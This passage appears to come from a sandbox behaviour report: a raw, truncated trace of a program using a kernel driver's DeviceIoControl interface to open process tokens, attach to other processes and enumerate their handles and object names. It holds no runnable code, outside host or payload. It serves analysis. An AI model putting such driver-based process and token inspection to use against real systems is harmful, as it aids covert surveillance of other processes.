bInheritHandle=0, dwProcessId=0x4e0) returned 0xc8 [0247.739] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.739] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020a0490, HandleInformation=0x0) returned 0x0 [0247.739] ObOpenObjectByPointer (in: Object=0xfffffa80020a0490, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0247.739] ObfDereferenceObject (Object=0xfffffa80020a0490) returned 0x23 [0247.739] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa80030a0180 | out: TokenHandle=0xfffffa80030a0180*=0xc4) returned 0x0 [0247.739] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0247.739] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.740] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.740] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.742] CloseHandle (hObject=0xc4) returned 1 [0247.742] CloseHandle (hObject=0xc8) returned 1 [0247.742] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.742] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0247.742] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.742] PsAcquireProcessExitSynchronization () returned 0x0 [0247.742] KeStackAttachProcess (in: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0) [0247.742] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80030c6f20, HandleInformation=0x0) returned 0x0 [0247.742] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.742] PsReleaseProcessExitSynchronization () returned 0x2 [0247.742] ObfDereferenceObject (Object=0xfffffa80020a0490) returned 0x21 [0247.742] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.742] ObfDereferenceObject (Object=0xfffffa80030c6f20) returned 0x1 [0247.742] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.742] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.742] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.742] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0247.743] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.743] PsAcquireProcessExitSynchronization () returned 0x0 [0247.743] KeStackAttachProcess (in: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0) [0247.743] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800266ac20, HandleInformation=0x0) returned 0x0 [0247.743] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.743] PsReleaseProcessExitSynchronization () returned 0x2 [0247.743] ObfDereferenceObject (Object=0xfffffa80020a0490) returned 0x21 [0247.743] ObQueryNameString (in: Object=0xfffffa800266ac20, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.743] ObfDereferenceObject (Object=0xfffffa800266ac20) returned 0x1 [0247.743] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.743] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.743] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.743] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0247.743] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.743] PsAcquireProcessExitSynchronization () returned 0x0 [0247.743] KeStackAttachProcess (in: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0) [0247.743] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0247.743] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.743] PsReleaseProcessExitSynchronization () returned 0x2 [0247.743] ObfDereferenceObject (Object=0xfffffa80020a0490) returned 0x21 [0247.743] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.743] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x51 [0247.743] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.743] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.743] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.743] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0247.743] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.743] PsAcquireProcessExitSynchronization () returned 0x0 [0247.743] KeStackAttachProcess (in: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0) [0247.744] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002628e60, HandleInformation=0x0) returned 0x0 [0247.744] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.744] PsReleaseProcessExitSynchronization () returned 0x2 [0247.744] ObfDereferenceObject (Object=0xfffffa80020a0490) returned 0x21 [0247.744] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.744] ObfDereferenceObject (Object=0xfffffa8002628e60) returned 0x1 [0247.744] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.744] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.744] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.744] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0247.744] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.744] PsAcquireProcessExitSynchronization () returned 0x0 [0247.744] KeStackAttachProcess (in: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0) [0247.744] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a002164b60, HandleInformation=0x0) returned 0x0 [0247.744] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.744] PsReleaseProcessExitSynchronization () returned 0x2 [0247.744] ObfDereferenceObject (Object=0xfffffa80020a0490) returned 0x21 [0247.744] ObQueryNameString (in: Object=0xfffff8a002164b60, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.744] ObfDereferenceObject (Object=0xfffff8a002164b60) returned 0x1 [0247.744] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.744] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.744] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.744] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0247.744] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.744] PsAcquireProcessExitSynchronization () returned 0x0 [0247.744] KeStackAttachProcess (in: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0) [0247.744] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003116700, HandleInformation=0x0) returned 0x0 [0247.744] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.744] PsReleaseProcessExitSynchronization () returned 0x2 [0247.744] ObfDereferenceObject (Object=0xfffffa80020a0490) returned 0x21 [0247.744] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.745] ObfDereferenceObject (Object=0xfffffa8003116700) returned 0x1 [0247.745] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.745] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.745] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.745] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0247.745] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.745] PsAcquireProcessExitSynchronization () returned 0x0 [0247.745] KeStackAttachProcess (in: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0) [0247.745] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0247.745] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.745] PsReleaseProcessExitSynchronization () returned 0x2 [0247.745] ObfDereferenceObject (Object=0xfffffa80020a0490) returned 0x21 [0247.745] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.745] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xb [0247.745] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.745] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x264) returned 0x0 [0247.745] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.745] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.745] PsLookupProcessByProcessId (in: ProcessId=0x264, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.745] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.745] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.745] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.745] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.745] PsLookupProcessByProcessId (in: ProcessId=0x264, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.745] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.745] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.746] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.746] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.746] PsLookupProcessByProcessId (in: ProcessId=0x264, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.746] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.746] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d0) returned 0xc8 [0247.746] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.746] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80026b0b30, HandleInformation=0x0) returned 0x0 [0247.746] ObOpenObjectByPointer (in: Object=0xfffffa80026b0b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0247.746] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x25 [0247.746] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa80030a0180 | out: TokenHandle=0xfffffa80030a0180*=0xc4) returned 0x0 [0247.746] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0247.746] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.746] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.746] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.748] CloseHandle (hObject=0xc4) returned 1 [0247.748] CloseHandle (hObject=0xc8) returned 1 [0247.748] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.748] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0247.748] PsLookupProcessByProcessId (in: ProcessId=0x5d0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.748] PsAcquireProcessExitSynchronization () returned 0x0 [0247.748] KeStackAttachProcess (in: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0) [0247.748] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800261d390, HandleInformation=0x0) returned 0x0 [0247.748] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.748] PsReleaseProcessExitSynchronization () returned 0x2 [0247.748] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x23 [0247.748] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.748] ObfDereferenceObject (Object=0xfffffa800261d390) returned 0x3 [0247.748] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.748] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.748] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.748] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0247.748] PsLookupProcessByProcessId (in: ProcessId=0x5d0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.748] PsAcquireProcessExitSynchronization () returned 0x0 [0247.748] KeStackAttachProcess (in: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0) [0247.748] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800230a5b0, HandleInformation=0x0) returned 0x0 [0247.748] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.748] PsReleaseProcessExitSynchronization () returned 0x2 [0247.748] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x23 [0247.748] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.748] ObfDereferenceObject (Object=0xfffffa800230a5b0) returned 0x1 [0247.748] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.748] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.748] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.748] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x114, lpOverlapped=0x0) returned 1 [0247.749] PsLookupProcessByProcessId (in: ProcessId=0x5d0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.749] PsAcquireProcessExitSynchronization () returned 0x0 [0247.749] KeStackAttachProcess (in: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0) [0247.749] ObReferenceObjectByHandle (in: Handle=0x20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002679e60, HandleInformation=0x0) returned 0x0 [0247.749] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.749] PsReleaseProcessExitSynchronization () returned 0x2 [0247.749] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x23 [0247.749] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.749] ObfDereferenceObject (Object=0xfffffa8002679e60) returned 0x1 [0247.749] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.749] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.749] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.749] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0247.749] PsLookupProcessByProcessId (in: ProcessId=0x5d0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.749] PsAcquireProcessExitSynchronization () returned 0x0 [0247.749] KeStackAttachProcess (in: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0) [0247.749] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80032638e0, HandleInformation=0x0) returned 0x0 [0247.749] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.749] PsReleaseProcessExitSynchronization () returned 0x2 [0247.749] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x23 [0247.749] ObQueryNameString (in: Object=0xfffffa80019e2370, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.749] ObfDereferenceObject (Object=0xfffffa80032638e0) returned 0x3 [0247.749] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.749] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x748) returned 0x0 [0247.749] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.749] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.749] PsLookupProcessByProcessId (in: ProcessId=0x748, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.749] IofCompleteRequest (Irp=0xfffffa80028d6780, 